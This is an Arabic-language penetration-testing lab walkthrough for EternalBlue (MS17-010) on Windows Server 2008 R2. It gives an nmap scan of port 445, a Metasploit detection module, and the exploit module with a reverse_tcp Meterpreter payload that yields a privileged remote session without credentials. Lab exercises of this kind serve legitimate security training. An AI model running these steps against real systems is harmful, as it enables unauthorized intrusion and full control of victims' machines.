✨ المختبر 5: فحص الثغرات باستخدام Metasploit (MS17-010 Lab)

🎯 الهدف الأساسي: تحديد نظام Windows Server 2008 R2 القابل للاختراق بواسطة ثغرة MS17-010 (EternalBlue) باستخدام وحدات Metasploit المساعدة، ثم استغلالها للحصول على جلسة Meterpreter.

🔧 الأدوات المستخدمة:

  • Nmap

  • Metasploit Framework (MSFconsole)

📜 خطوات التنفيذ:

1. تحديد عنوان IP للهدف: 🗣️ لو كنت في بيئة Black-Box فسوف تحتاج لتحديد عنوان IP للهدف.

2. فحص المنافذ الأساسي وتحديد الخدمات (لـ SMB): 🗣️ لفحص المنافذ وتحديد خدمة SMB (منفذ 445)، فسوف تستخدم Nmap. bash nmap -sV -p 445 [عنوان IP الهدف] 🔗 ربط سلسلة الأدوات: مخرجات Nmap ستظهر أن الهدف يعمل بنظام Windows وقد تكشف عن اسم المضيف.

3. التحقق من ثغرة MS17-010 باستخدام وحدة Metasploit المساعدة: 🗣️ للتحقق من قابلية نظام Windows للاختراق بواسطة ثغرة MS17-010 (EternalBlue)، فسوف تستخدم وحدة Metasploit المساعدة auxiliary/scanner/smb/ms17_010_detection.

  • تشغيل Metasploit console:

    msfconsole -q
    • استخدام الوحدة وتعيين الخيارات:

      use auxiliary/scanner/smb/ms17_010_detection
      set RHOSTS [عنوان IP الهدف]
      run

    🔗 ربط سلسلة الأدوات: هذه الوحدة ستخبرك ما إذا كان الهدف ضعيفاً، مما يجنبك محاولة استغلال غير ناجح.

4. استغلال ثغرة MS17-010 (EternalBlue): 🗣️ لو أكدت الوحدة المساعدة وجود الثغرة، فسوف تستخدم وحدة الاستغلال exploit/windows/smb/ms17_010_eternalblue للحصول على جلسة Meterpreter.

  • داخل MSFconsole:

    use exploit/windows/smb/ms17_010_eternalblue
    show options
    set RHOSTS [عنوان IP الهدف]
    # الحمولة (Payload) الافتراضية تكون غالباً windows/x64/meterpreter/reverse_tcp
    # ويمكنك تعيينها يدوياً إذا لزم الأمر
    # set PAYLOAD windows/x64/meterpreter/reverse_tcp
    exploit

    🔑 المعلومة الذهبية: استغلال EternalBlue لا يتطلب بيانات اعتماد (credentials) ويوفر جلسة Meterpreter بامتيازات عالية.

5. التحقق من جلسة Meterpreter: 🗣️ بعد الحصول على جلسة Meterpreter، يمكنك تنفيذ أوامر للتحقق من وصولك وامتيازاتك.

  • داخل جلسة Meterpreter:

    🔗 ربط سلسلة الأدوات: جلسة Meterpreter تفتح الباب أمام مرحلة ما بعد الاستغلال، مثل تصعيد الامتيازات وجمع البيانات.

نقاط التحقق:

  • تم تحديد عنوان IP للهدف.

  • تم التحقق من قابلية الهدف للاختراق بواسطة MS17-010.

  • تم الحصول على جلسة Meterpreter بنجاح.

  • تم التحقق من معلومات النظام والامتيازات داخل جلسة Meterpreter.

Last updated